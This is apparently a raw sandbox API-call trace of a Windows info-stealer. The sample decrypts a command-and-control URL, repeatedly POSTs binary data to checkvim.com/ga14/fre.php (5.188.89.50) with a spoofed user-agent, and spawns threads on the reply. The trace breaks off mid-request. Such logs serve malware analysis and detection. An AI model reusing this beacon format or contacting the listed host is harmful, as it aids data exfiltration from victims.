GetProcessHeap () returned 0x840000 [0222.797] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0222.798] GetProcessHeap () returned 0x840000 [0222.798] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0222.798] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0222.800] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0222.800] GetProcessHeap () returned 0x840000 [0222.800] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0222.800] GetProcessHeap () returned 0x840000 [0222.800] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0222.800] GetProcessHeap () returned 0x840000 [0222.800] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fa70 [0222.800] GetProcessHeap () returned 0x840000 [0222.800] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0222.801] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0222.802] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0222.802] GetProcessHeap () returned 0x840000 [0222.802] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0222.802] GetProcessHeap () returned 0x840000 [0222.802] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0222.802] send (s=0x2d8, buf=0x873a58*, len=237, flags=0) returned 237 [0222.802] send (s=0x2d8, buf=0x87eb58*, len=159, flags=0) returned 159 [0222.803] GetProcessHeap () returned 0x840000 [0222.803] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0222.803] recv (in: s=0x2d8, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0223.177] GetProcessHeap () returned 0x840000 [0223.177] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0223.177] GetProcessHeap () returned 0x840000 [0223.177] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0223.177] GetProcessHeap () returned 0x840000 [0223.177] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0223.177] GetProcessHeap () returned 0x840000 [0223.177] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0223.177] closesocket (s=0x2d8) returned 0 [0223.178] GetProcessHeap () returned 0x840000 [0223.178] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0223.178] GetProcessHeap () returned 0x840000 [0223.178] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0223.178] GetProcessHeap () returned 0x840000 [0223.178] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0223.178] GetProcessHeap () returned 0x840000 [0223.178] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871240 | out: hHeap=0x840000) returned 1 [0223.179] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x36c) returned 0x2d8 [0223.181] Sleep (dwMilliseconds=0xea60) [0223.183] GetProcessHeap () returned 0x840000 [0223.183] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f9e0 [0223.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.186] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0223.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.193] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0223.203] GetProcessHeap () returned 0x840000 [0223.203] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0223.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.204] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0223.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.205] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0223.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.217] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.217] GetProcessHeap () returned 0x840000 [0223.217] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0223.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.218] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f9e0, pdwDataLen=0x19f9a4 | out: pbData=0x87f9e0, pdwDataLen=0x19f9a4) returned 1 [0223.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.219] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0223.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.220] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0223.220] GetProcessHeap () returned 0x840000 [0223.221] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0223.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.222] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0223.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.223] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0223.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.224] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0223.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.225] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0223.225] GetProcessHeap () returned 0x840000 [0223.225] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0223.225] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0223.226] GetProcessHeap () returned 0x840000 [0223.226] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0223.226] GetProcessHeap () returned 0x840000 [0223.226] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0223.226] GetProcessHeap () returned 0x840000 [0223.226] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0223.226] GetProcessHeap () returned 0x840000 [0223.226] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0223.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.227] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0223.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.234] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0223.246] GetProcessHeap () returned 0x840000 [0223.246] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0223.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.247] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e570) returned 1 [0223.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.248] CryptSetKeyParam (hKey=0x87e570, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0223.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.251] CryptSetKeyParam (hKey=0x87e570, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.251] GetProcessHeap () returned 0x840000 [0223.251] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0223.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.252] CryptDecrypt (in: hKey=0x87e570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0223.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.253] CryptDestroyKey (hKey=0x87e570) returned 1 [0223.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.256] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0223.256] GetProcessHeap () returned 0x840000 [0223.256] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0223.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.257] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0223.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.258] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0223.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.260] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0223.260] GetProcessHeap () returned 0x840000 [0223.260] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0223.260] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0223.261] GetProcessHeap () returned 0x840000 [0223.261] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0223.261] socket (af=2, type=1, protocol=6) returned 0x2dc [0223.262] connect (s=0x2dc, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0223.329] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0223.329] GetProcessHeap () returned 0x840000 [0223.329] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fe80 [0223.330] GetProcessHeap () returned 0x840000 [0223.330] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0223.330] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0223.332] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0223.332] GetProcessHeap () returned 0x840000 [0223.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0223.332] GetProcessHeap () returned 0x840000 [0223.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0223.332] GetProcessHeap () returned 0x840000 [0223.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0223.332] GetProcessHeap () returned 0x840000 [0223.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0223.333] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0223.334] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0223.334] GetProcessHeap () returned 0x840000 [0223.334] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0223.334] GetProcessHeap () returned 0x840000 [0223.334] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0223.334] send (s=0x2dc, buf=0x873a58*, len=237, flags=0) returned 237 [0223.335] send (s=0x2dc, buf=0x87eb58*, len=159, flags=0) returned 159 [0223.335] GetProcessHeap () returned 0x840000 [0223.335] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0223.335] recv (in: s=0x2dc, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0223.704] GetProcessHeap () returned 0x840000 [0223.704] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0223.704] GetProcessHeap () returned 0x840000 [0223.704] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0223.704] GetProcessHeap () returned 0x840000 [0223.705] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0223.705] GetProcessHeap () returned 0x840000 [0223.705] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fe80 | out: hHeap=0x840000) returned 1 [0223.705] closesocket (s=0x2dc) returned 0 [0223.706] GetProcessHeap () returned 0x840000 [0223.706] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0223.706] GetProcessHeap () returned 0x840000 [0223.706] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0223.706] GetProcessHeap () returned 0x840000 [0223.706] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0223.707] GetProcessHeap () returned 0x840000 [0223.707] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0223.707] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xf88) returned 0x2dc [0223.710] Sleep (dwMilliseconds=0xea60) [0223.715] GetProcessHeap () returned 0x840000 [0223.715] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0223.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.730] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0223.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.786] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0223.796] GetProcessHeap () returned 0x840000 [0223.796] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0223.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.797] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e630) returned 1 [0223.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.800] CryptSetKeyParam (hKey=0x87e630, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0223.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.802] CryptSetKeyParam (hKey=0x87e630, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.802] GetProcessHeap () returned 0x840000 [0223.802] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0223.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.803] CryptDecrypt (in: hKey=0x87e630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0223.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.804] CryptDestroyKey (hKey=0x87e630) returned 1 [0223.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.805] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0223.805] GetProcessHeap () returned 0x840000 [0223.805] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0223.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.807] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0223.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.808] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0223.809] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.809] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0223.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.810] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0223.811] GetProcessHeap () returned 0x840000 [0223.811] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0223.811] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0223.811] GetProcessHeap () returned 0x840000 [0223.811] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0223.811] GetProcessHeap () returned 0x840000 [0223.811] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0223.812] GetProcessHeap () returned 0x840000 [0223.812] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0223.812] GetProcessHeap () returned 0x840000 [0223.812] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fab8 [0223.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.813] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0223.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.819] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0223.827] GetProcessHeap () returned 0x840000 [0223.827] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0223.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.828] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0223.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.830] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0223.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.832] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.832] GetProcessHeap () returned 0x840000 [0223.832] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0223.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.833] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fab8, pdwDataLen=0x19f9a4 | out: pbData=0x87fab8, pdwDataLen=0x19f9a4) returned 1 [0223.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.834] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0223.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0223.836] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0223.836] GetProcessHeap () returned 0x840000 [0223.836] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0223.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.837] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0223.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.838] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0223.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0223.839] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0223.840] GetProcessHeap () returned 0x840000 [0223.840] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0223.840] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0223.842] GetProcessHeap () returned 0x840000 [0223.842] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b78 [0223.842] socket (af=2, type=1, protocol=6) returned 0x2e0 [0223.842] connect (s=0x2e0, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0223.909] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0223.909] GetProcessHeap () returned 0x840000 [0223.909] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0223.909] GetProcessHeap () returned 0x840000 [0223.909] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0223.911] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0223.914] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0223.914] GetProcessHeap () returned 0x840000 [0223.914] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0223.914] GetProcessHeap () returned 0x840000 [0223.914] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0223.914] GetProcessHeap () returned 0x840000 [0223.914] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb00 [0223.915] GetProcessHeap () returned 0x840000 [0223.915] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0223.916] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0223.917] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 